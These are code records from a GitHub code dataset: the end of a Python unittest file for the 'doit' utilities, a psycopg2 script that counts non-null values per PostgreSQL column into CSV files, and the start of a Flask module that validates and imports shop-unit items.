= time.localtime\n self.__old_timezone = time.timezone\n time.localtime = _localtime\n time.timezone = env['tz']\n #-def\n\n def restore(self):\n time.localtime = self.__old_localtime\n time.timezone = self.__old_timezone\n #-def\n#-class\n\nclass FunctorA(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass FunctorB(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass TestOrdinalSuffixCase(unittest.TestCase):\n\n def test_ordinal_suffix(self):\n cases = [\n (0, 'th'),\n (1, 'st'),\n 
(2, 'nd'),\n            (3, 'rd'),\n            (4, 'th'),\n            (5, 'th'),\n            (10, 'th'),\n            (11, 'th'),\n            (12, 'th'),\n            (13, 'th'),\n            (14, 'th'),\n            (15, 'th'),\n            (20, 'th'),\n            (21, 'st'),\n            (22, 'nd'),\n            (23, 'rd'),\n            (24, 'th'),\n            (25, 'th'),\n            (30, 'th'),\n            (31, 'st'),\n            (32, 'nd'),\n            (33, 'rd'),\n            (34, 'th'),\n            (35, 'th'),\n            (50, 'th'),\n            (51, 'st'),\n            (52, 'nd'),\n            (53, 'rd'),\n            (54, 'th'),\n            (55, 'th'),\n            (90, 'th'),\n            (91, 'st'),\n            (92, 'nd'),\n            (93, 'rd'),\n            (94, 'th'),\n            (95, 'th')\n        ]\n        bases = [0, 100, 1000, 10000, 1000000]\n\n        for b in bases:\n            for c in cases:\n                self.assertEqual(ordinal_suffix(b + c[0]), c[1])\n                self.assertEqual(ordinal_suffix(-(b + c[0])), c[1])\n    #-def\n#-class\n\nclass TestDeepEqCase(unittest.TestCase):\n\n    def test_deep_eq(self):\n        x1 = lambda x: x\n\n        self.assertTrue(deep_eq(x1, x1))\n\n        self.assertTrue(deep_eq([], []))\n        self.assertTrue(deep_eq([], ()))\n        self.assertTrue(deep_eq((), []))\n        self.assertTrue(deep_eq((), ()))\n\n        self.assertFalse(deep_eq({}, ()))\n        self.assertFalse(deep_eq([], {}))\n        self.assertTrue(deep_eq({}, {}))\n\n        self.assertTrue(deep_eq([[]], [()]))\n        self.assertFalse(deep_eq([], [()]))\n\n        self.assertTrue(deep_eq([[1, 2], [3]], [(1, 2), (3,)]))\n        self.assertTrue(deep_eq([[1, 2], [3, (4, 5)]], [(1, 2), (3, [4, 5])]))\n        self.assertFalse(deep_eq(\n            [[1, 2], [3, (4, 5)]],\n            [(1, 2), (3, [4, [5]])]\n        ))\n\n        self.assertTrue(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1}))\n        self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 0}))\n        self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'x': 1}))\n        self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1, 1: 1}))\n        self.assertTrue(deep_eq(\n            {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n            {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]}\n        ))\n        self.assertFalse(deep_eq(\n            {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n            {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3, 4)})}]}\n        ))\n\n        self.assertTrue(deep_eq(1, 1))\n        self.assertFalse(deep_eq(1, 2))\n    #-def\n#-class\n\nclass TestTimeStampCase(unittest.TestCase):\n\n    def test_dst(self):\n        env = dict(\n            year = 2008, month = 7, day = 11,\n            hour = 13, min = 15, sec = 34,\n            isdst = 1, tz = -5378\n        )\n        with TimeModuleMock(env):\n            t = timestamp()\n        self.assertEqual(t['year'], 2008)\n
self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 4)\n self.assertEqual(t['utcmin'], 0)\n self.assertEqual(t['utcsec'], 0)\n self.assertEqual(t['dsthour'], 0)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n#-class\n\nclass TestFunctorCase(unittest.TestCase):\n\n def test_equality(self):\n f1 = FunctorA(1, 2, c = 4)\n f2 = FunctorB(1, 2, c = 4)\n f3 = FunctorA(1, 2, 4)\n\n self.assertNotEqual(f1, f2)\n self.assertEqual(f1, f3)\n #-def\n#-class\n\nclass TestWithStatementExceptionHandlerCase(unittest.TestCase):\n\n def test_what_happen_when_exception_is_not_raised(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_from_enter(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(RAISE_FROM_ENTER)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_within_block(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_not_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n#-class\n\nclass TestCollectionCase(unittest.TestCase):\n\n def test_create_unique_objects(self):\n a = Collection('MyColl1')\n\n self.assertEqual(a.name, 'MyColl1')\n self.assertEqual(a.qname, 'MyColl1')\n\n b = Collection('MyColl1')\n\n self.assertEqual(b.name, 'MyColl1')\n self.assertEqual(b.qname, 'MyColl1')\n\n c = Collection('MyColl2')\n\n self.assertEqual(c.name, 'MyColl2')\n self.assertEqual(c.qname, 'MyColl2')\n\n d = Collection()\n e = Collection()\n\n self.assertIs(a, b)\n self.assertEqual(a.name, b.name)\n self.assertEqual(a.qname, b.qname)\n self.assertIsNot(a, c)\n self.assertNotEqual(a.name, c.name)\n self.assertNotEqual(a.qname, c.qname)\n self.assertIsNot(d, e)\n self.assertNotEqual(d.name, e.name)\n self.assertNotEqual(d.qname, e.qname)\n #-def\n\n def test_create_subobjects(self):\n Fruit = Collection('Fruit')\n\n self.assertEqual(Fruit.name, 'Fruit')\n self.assertEqual(Fruit.qname, 'Fruit')\n\n Apple = Fruit.Apple\n\n self.assertEqual(Apple.name, 'Apple')\n self.assertEqual(Apple.qname, 'Fruit.Apple')\n\n Orange = Fruit.Orange\n\n self.assertEqual(Orange.name, 'Orange')\n self.assertEqual(Orange.qname, 'Fruit.Orange')\n\n Banana = Fruit.Banana\n\n self.assertEqual(Banana.name, 'Banana')\n self.assertEqual(Banana.qname, 'Fruit.Banana')\n\n Vegetable = 
Collection('Vegetable')\n\n self.assertEqual(Vegetable.name, 'Vegetable')\n self.assertEqual(Vegetable.qname, 'Vegetable')\n\n Carrot = Vegetable.Carrot\n\n self.assertEqual(Carrot.name, 'Carrot')\n self.assertEqual(Carrot.qname, 'Vegetable.Carrot')\n\n Potato = Vegetable.Potato\n\n self.assertEqual(Potato.name, 'Potato')\n self.assertEqual(Potato.qname, 'Vegetable.Potato')\n\n Tomato = Vegetable.Tomato\n\n self.assertEqual(Tomato.name, 'Tomato')\n self.assertEqual(Tomato.qname, 'Vegetable.Tomato')\n\n Dairy = Collection('Dairy')\n\n self.assertEqual(Dairy.name, 'Dairy')\n self.assertEqual(Dairy.qname, 'Dairy')\n\n Cheese = Dairy.Cheese\n\n self.assertEqual(Cheese.name, 'Cheese')\n self.assertEqual(Cheese.qname, 'Dairy.Cheese')\n\n Chedar = Cheese.Chedar\n\n self.assertEqual(Chedar.name, 'Chedar')\n self.assertEqual(Chedar.qname, 'Dairy.Cheese.Chedar')\n\n ProceededChedar = Chedar.Proceeded\n\n self.assertEqual(ProceededChedar.name, 'Proceeded')\n self.assertEqual(\n ProceededChedar.qname, 'Dairy.Cheese.Chedar.Proceeded'\n )\n\n Ementaler = Cheese.Ementaler\n\n self.assertEqual(Ementaler.name, 'Ementaler')\n self.assertEqual(Ementaler.qname, 'Dairy.Cheese.Ementaler')\n\n Food = Collection(\n 'Food', 'Fruit', 'Vegetable', 'Dairy.Cheese.Chedar', 'Dairy.Cheese'\n )\n\n self.assertEqual(Food.name, 'Food')\n self.assertEqual(Food.qname, 'Food')\n self.assertIs(Apple, Food.Apple)\n self.assertIs(Orange, Food.Orange)\n self.assertIs(Banana, Food.Banana)\n self.assertIs(Carrot, Food.Carrot)\n self.assertIs(Potato, Food.Potato)\n self.assertIs(Tomato, Food.Tomato)\n self.assertIs(Chedar, Food.Chedar)\n self.assertIs(ProceededChedar, Food.Proceeded)\n self.assertIs(Food.Chedar.Proceeded, Food.Proceeded)\n self.assertIs(Ementaler, Food.Ementaler)\n #-def\n\n def test_contains_operator(self):\n A = Collection(\"A\")\n B = Collection(\"@\")\n\n self.assertNotIn(A, B)\n self.assertNotIn(B, A)\n self.assertIn(A, A)\n self.assertIn(B, B)\n self.assertIn(A.B, A)\n self.assertNotIn(A.B, A.C)\n self.assertIn(B.C.D.S, B.C)\n self.assertNotIn(B, B.A)\n self.assertNotIn(A.BCEF.G, A.BCE)\n self.assertIn(A.BCE.G, A.BCE)\n #-def\n\n def test_lock(self):\n with self.assertRaises(DoItAssertionError):\n Collection.lock()\n T = Collection(\"T\")\n with self.assertRaises(DoItAssertionError):\n Collection.unlock()\n T = Collection(\"T\")\n Collection.lock()\n t = T.Test\n #-def\n\n def test_unlock(self):\n Collection.lock()\n Collection.unlock()\n Test = Collection(\"Test\")\n t = Test.Test1\n #-def\n\n def tearDown(self):\n Collection.unlock()\n #-def\n#-class\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestOrdinalSuffixCase))\n suite.addTest(unittest.makeSuite(TestDeepEqCase))\n suite.addTest(unittest.makeSuite(TestTimeStampCase))\n suite.addTest(unittest.makeSuite(TestFunctorCase))\n suite.addTest(unittest.makeSuite(TestWithStatementExceptionHandlerCase))\n suite.addTest(unittest.makeSuite(TestCollectionCase))\n return suite\n#-def\n", "repo_name": "i386x/doit", "sub_path": "tests/test_support/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 15829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "common.ModuleContext", "line_number": 69, "usage_type": "name"}, {"api_name": "common.ModuleContext.__init__", "line_number": 76, "usage_type": "call"}, {"api_name": "common.ModuleContext", "line_number": 76, "usage_type": "name"}, {"api_name": "time.localtime", 
"line_number": 77, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 93, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 99, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 100, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Functor", "line_number": 104, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 108, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 108, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor", "line_number": 112, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 116, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 116, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 120, "usage_type": "attribute"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 165, "usage_type": "call"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 166, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 170, "usage_type": "attribute"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 177, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 178, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 179, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 180, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 182, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 183, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 184, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 186, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 187, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 189, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 190, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 191, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 196, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 197, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 198, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 199, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 200, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 204, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 209, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 210, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 214, "usage_type": "attribute"}, {"api_name": "doit.support.utils.timestamp", "line_number": 223, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 246, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 269, "usage_type": "call"}, {"api_name": 
"unittest.TestCase", "line_number": 286, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 298, "usage_type": "attribute"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 301, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 302, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 313, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 314, "usage_type": "call"}, {"api_name": "common.RAISE_FROM_ENTER", "line_number": 314, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 325, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 326, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 337, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 338, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 338, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 349, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 350, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 350, "usage_type": "argument"}, {"api_name": "unittest.TestCase", "line_number": 361, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Collection", "line_number": 364, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 369, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 374, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 379, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 380, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 394, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 414, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 434, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 461, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 480, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 481, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 496, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 497, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 497, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 498, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 499, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 500, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 500, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 501, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 502, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 502, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 507, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 507, "usage_type": "name"}, {"api_name": 
"doit.support.utils.Collection.unlock", "line_number": 508, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 508, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 509, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 514, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 514, "usage_type": "name"}, {"api_name": "unittest.TestSuite", "line_number": 519, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 520, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 521, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 522, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 523, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 524, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 525, "usage_type": "call"}]}
+{"seq_id": "19232783049", "text": "import psycopg2\nimport logging\nimport os\nfrom time import time\nimport csv\n\n\ndef create_csv(filename):\n if os.path.isfile(filename):\n print('Result file already exist')\n else:\n print('Creating result file')\n with open(filename, 'w+') as myfile:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow((\"Column\", \"Not Null\", \"Not_Null %\"))\n\n\ndef save_csv(main_data, filename):\n with open(filename, 'a') as myfile:\n try:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow(main_data)\n except:\n print('Error while adding new line')\n\n\ndef queries():\n \"\"\"\n Choose your destiny\n :return: all chosen queries you want\n \"\"\"\n query_col_name1 = \"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '\"\n query_col_name2 = \"' ORDER BY ORDINAL_POSITION\"\n query_count1 = \"SELECT COUNT(*) FROM \"\n query_count2 = \" is not null\"\n select_query = \"SELECT * FROM \"\n set_schema = \"SET search_path TO rocket_data_raw\"\n set_role = \"SET role employees\"\n return query_col_name1, query_col_name2, query_count1, query_count2\n\n\ndef close_con(con_cursor, con_connection):\n con_cursor.close()\n con_connection.close()\n print(\"PostgreSQL connection is closed\")\n\n\ndef manage_connection():\n pg_user = 'urs'\n pg_password = 'urs'\n pg_host = 'urs'\n pg_port = 'urs'\n db_name = 'urs'\n schema = 'urs'\n con = psycopg2.connect(user=pg_user, password=pg_password, host=pg_host, port=pg_port, database=db_name)\n main_cursor = con.cursor()\n return con, main_cursor\n\n\ndef do_query(cursor, table, total, output):\n print(\"\\nChecking the '\" + table + \"' table ...\")\n q1, q2, q3, q4 = queries()\n column_name_query = q1 + table + q2\n cursor.execute(column_name_query)\n raw = cursor.fetchall()\n\n cols = [x[0] for x in raw]\n for c in cols:\n print(\"- Checking column '\" + c + \"' ...\")\n not_null_query = q3 + table + ' WHERE ' + c + q4\n # not null values count\n cursor.execute(not_null_query)\n nulls = cursor.fetchone()[0]\n\n # log and append result in csv\n null_percent = \"{: 10.2f}\".format(nulls / total * 100)\n save_csv([c, nulls, null_percent + '%'], output, )\n print(\"--> Not null values \" + c + \": \" + \"{:,}\".format(nulls) + '/' + \"{:,}\".format(total) + ' | ' + null_percent + ' %\\n')\n\n\ndef execute():\n try:\n # tables in 'rocket_raw' schema with total row count\n # Note - you can decide to query every table total count if you decide but i didnt. 
i explicitly hard coded it :)\n tables = {'Employee1': 49937443, 'Employee2': 161776046, 'Employee3': 55300300, 'Employee4': 228049317, 'Employee5': 190534019,\n 'Employee6': 146851802}\n\n connection, cursor = manage_connection()\n if connection:\n print(\"\\n ---------------------------------------- Connection opened for ------------------------------------------------------- \\n\")\n print(connection.get_dsn_parameters(), \"\\n\")\n cursor.execute(\"SELECT version();\")\n record = cursor.fetchall()\n print(\"You are connected to - \", record, \"\\n\")\n\n # Operation starts now -----------------------------------------------------------------------------------------------------------\n # *****************************************************\n # SET UR SEARCH PATH TO YOUR SCHEMA HERE\n # *****************************************************\n cursor.execute(\"SET search_path TO ************UR SCHEMA********************\")\n for table, total in tables.items():\n filename = os.getcwd() + os.sep + 'Output' + os.sep + 'File_' + table + '.csv'\n print(filename)\n create_csv(filename)\n do_query(cursor, table, total, filename)\n close_con(cursor, connection)\n\n except psycopg2.DatabaseError as db_error:\n print(\"Error while connecting to PostgreSQL \", db_error)\n pass\n\n\nstart = time()\nexecute()\nend = time()\nprint(\"TIme {}'s\".format(end - start))\n", "repo_name": "pesto93/Postgres-with-python", "sub_path": "Sql_counts.py", "file_name": "Sql_counts.py", "file_ext": "py", "file_size_in_byte": 4192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 102, "usage_type": "attribute"}, {"api_name": "psycopg2.DatabaseError", "line_number": 108, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "time.time", "line_number": 115, "usage_type": "call"}]}
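Stripped of the CSV bookkeeping, the per-column check in do_query() above reduces to two COUNT queries per column. A minimal stand-alone version, with placeholder credentials as in the script and a hypothetical Employee1.name column:

import psycopg2

# placeholder connection values, as in the script above
conn = psycopg2.connect(user='urs', password='urs', host='urs',
                        port='urs', database='urs')
cur = conn.cursor()
cur.execute("SELECT COUNT(*) FROM Employee1")  # total rows
total = cur.fetchone()[0]
cur.execute("SELECT COUNT(*) FROM Employee1 WHERE name IS NOT NULL")
not_null = cur.fetchone()[0]  # rows with a value in this column
print("name: {}/{} not null ({:.2f}%)".format(not_null, total, 100 * not_null / total))
cur.close()
conn.close()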
+{"seq_id": "37861589923", "text": "import datetime\nfrom db import db\nfrom components.schemas.ShopUnitImport import ShopUnitImport\nfrom components.schemas.ShopUnit import ShopUnit\nfrom components.schemas.ShopUnitType import ShopUnitType\nfrom components.schemas.ShopUnitStatistic import ShopUnitStatistic\nfrom components.schemas.ShopUnitImportRequest import ShopUnitImportRequest\nfrom flask import request\nfrom my_logs.logg import info_log, warning_log\nfrom .base_function import delete_child, response_error_400, TIME_FORMAT\nfrom flask import Blueprint\n\n\nbp_imports = Blueprint('imports', __name__)\n\n\n\n\ndef valid_request_json(data: dict, time_format: str) -> bool:\n '''\n Проверка форматы даты и основной структуры\n '''\n\n if 'items' not in data or 'updateDate' not in data or len(data) != 2:\n info_log.warning('POST:/imports Проблемы с общей структурой входных данных')\n warning_log.warning(\n f'POST:/imports Проблемы с общей структурой входных данных:\\ndata={data}\\n, 400')\n return False\n\n try:\n datetime.datetime.strptime(data['updateDate'], time_format)\n return True\n except ValueError:\n info_log.warning(f'POST:/imports Проблемы с форматом даты')\n warning_log.warning(\n f'POST:/imports Проблемы с форматом даты:\\ndata={data}\\n, 400')\n return False\n\n\ndef is_category(node_id: object) -> bool:\n if node_id is None:\n return True\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n category = node.type\n return category == 'CATEGORY'\n return True\n\n\ndef valid_structure_item(item: dict) -> bool:\n '''\n Проверяем все ли необходимые параметры нам передали.\n '''\n if item['type'] in ['CATEGORY', 'OFFER']:\n if all(key in item for key in ['id', 'name', 'type']) and item['name'] is not None:\n return True\n info_log.warning('POST:/imports Проблемы с отдельной структурой item')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item:\\nitem={item}\\n, 400')\n return False\n\n\ndef valid_item(item: dict) -> bool:\n '''\n Проверка: Дочерние эл-ты могут быть только у CATEGORY\n '''\n parent_id = value_or_none(dict_=item, key_='parentId')\n price = value_or_none(dict_=item, key_='price')\n if not is_category(parent_id):\n info_log.warning(f'POST:/imports родителем может быть только категория')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (parent_id) :\\nitem={item}\\n, 400')\n return False\n if price is not None and price < 0:\n info_log.warning(f'POST:/imports цена должна быть больше 0')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (price) :\\nitem={item}\\n, 400')\n return False\n return True\n\n\ndef value_or_none(dict_: dict, key_: str) -> object:\n if key_ in dict_:\n return dict_[key_]\n return None\n\n\ndef add_child(id_child: str, id_parent: object) -> None:\n '''\n У узла id_parent появился дочерний эл-т id_child\n '''\n parent = ShopUnit.query.filter_by(id=id_parent).first()\n if id_child != id_parent: # проверяем на циклы\n if parent is not None: # если это корень, то пропускаем шаг\n if parent.children is not None:\n parent.children = set(list(parent.children) + [id_child])\n else:\n parent.children = [id_child]\n\n\ndef check_type_context(type: str, price: object) -> bool:\n '''\n Проверка параметров, зависящих от типа\n '''\n if type == 'CATEGORY':\n if price is not None:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n if type == 'OFFER':\n if price is None or price < 
0:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n\n return True\n\n\ndef save_statistic(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Фиксируем любое изменение для статистики\n '''\n\n problem = ShopUnitStatistic.query.filter_by(id=node_id).filter_by(date=time_).first()\n if problem is None:\n new_node = ShopUnitStatistic(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n new_node.price = price\n db.session.add(new_node)\n else:\n info_log.info('поле updateDate монотонно возрастает по условию')\n\n\ndef add_node(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Функция добавления новой записи по id\n '''\n new_node = ShopUnit(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n add_child(id_child=node_id, id_parent=parentId)\n new_node.price = price\n if type_ == 'CATEGORY':\n new_node.children = []\n db.session.add(new_node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(f'POST:/imports Новый обьект id={node_id}, 200')\n\n\n\n\ndef update_date_parent(node_id: object, time_update: datetime) -> None:\n '''\n Функция обновления даты по id родителя\n '''\n if node_id is None:\n return\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n node.date = time_update\n db.session.add(node)\n save_statistic(node_id=node.id, parentId=node.parentId, name=node.name, type_=node.type, price=node.price,\n time_=time_update)\n update_date_parent(node_id=node.parentId, time_update=time_update)\n\n\ndef save_import_fact(node_id: str, name: str, parentId: object, type: str, price: object) -> None:\n '''\n Фиксируем факт импорта\n '''\n unit_import = ShopUnitImport.query.filter_by(id=node_id).first()\n if unit_import is None:\n unit_import = ShopUnitImport(id=node_id, name=name, type=type)\n unit_import.name = name\n unit_import.parentId = parentId\n unit_import.type = type\n unit_import.price = price\n db.session.add(unit_import)\n\n\ndef save_request_fact(ids: set, update_date: datetime):\n '''\n Фиксируем факт отправки\n '''\n new_import_request = ShopUnitImportRequest()\n new_import_request.items = list(ids)\n new_import_request.updateDate = update_date\n db.session.add(new_import_request)\n\n\ndef update_node(node_id: str, old_parentId: object, parentId: object, name: str, type_: str, price: object,\n time_: datetime) -> None:\n '''\n Обновление значений записи в бд по id\n '''\n node = ShopUnit.query.filter_by(id=node_id).first()\n node.parentId = parentId\n delete_child(id_child=node_id, id_parent=old_parentId) #удаляем ребенка у старого родителя\n add_child(id_child=node_id, id_parent=parentId) #добавляем ребенка новому родителю\n node.name = name\n node.type = type_\n node.price = price\n node.date = time_\n db.session.add(node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(\n f'POST:/imports Обновление обьекта id={node_id} name={name}, price={price}, date={time_} ch={node.children}, 200')\n\n\n\ndef id_duplicate(ids: set, new_id: str) -> bool:\n '''\n Проверка на наличие дубликатов id.\n ids - множество всех id в текущем запросе\n '''\n if new_id 